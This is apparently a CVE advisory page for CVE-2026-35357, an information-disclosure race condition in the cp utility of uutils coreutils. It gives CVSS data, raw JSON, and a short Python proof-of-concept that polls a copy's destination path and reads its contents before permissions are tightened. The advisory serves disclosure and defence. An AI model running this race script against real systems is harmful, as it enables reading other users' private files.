Security Vulnerability Report
中文
CVE-2026-35357 CVSS 4.7 MEDIUM

CVE-2026-35357

Published: 2026-04-22 17:16:38
Last Modified: 2026-04-24 19:02:54
Source: [email protected]

Description

The cp utility in uutils coreutils is vulnerable to an information disclosure race condition. Destination files are initially created with umask-derived permissions (e.g., 0644) before being restricted to their final mode (e.g., 0600) later in the process. A local attacker can race to open the file during this window; once obtained, the file descriptor remains valid and readable even after the permissions are tightened, exposing sensitive or private file contents.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:* - VULNERABLE
uutils coreutils (具体版本请参考官方通告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os import time # Simulating the race condition attack # This script attempts to open the destination file before permissions are tightened. def attacker_thread(dest_file): print("[+] Attacker thread started...") while True: try: # Attempt to open the file read-only # If umask is 0644, this might succeed before chmod to 0600 fd = os.open(dest_file, os.O_RDONLY) print(f"[+] Race won! File descriptor acquired: {fd}") # Read content data = os.read(fd, 1024) print(f"[+] Leaked data: {data.decode(errors='ignore')}") os.close(fd) break except (FileNotFoundError, PermissionError): # File not created yet or permissions already restricted time.sleep(0.0001) # High frequency polling continue if __name__ == "__main__": target = "/tmp/copy_of_secret" # In a real scenario, run this while `cp source target` is executing attacker_thread(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35357", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:38.267", "lastModified": "2026-04-24T19:02:53.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The cp utility in uutils coreutils is vulnerable to an information disclosure race condition. Destination files are initially created with umask-derived permissions (e.g., 0644) before being restricted to their final mode (e.g., 0600) later in the process. A local attacker can race to open the file during this window; once obtained, the file descriptor remains valid and readable even after the permissions are tightened, exposing sensitive or private file contents."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:*", "matchCriteriaId": "4A9AF9E4-E17C-48AD-8051-B49998618839"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/issues/10011", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/uutils/coreutils/issues/10011", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.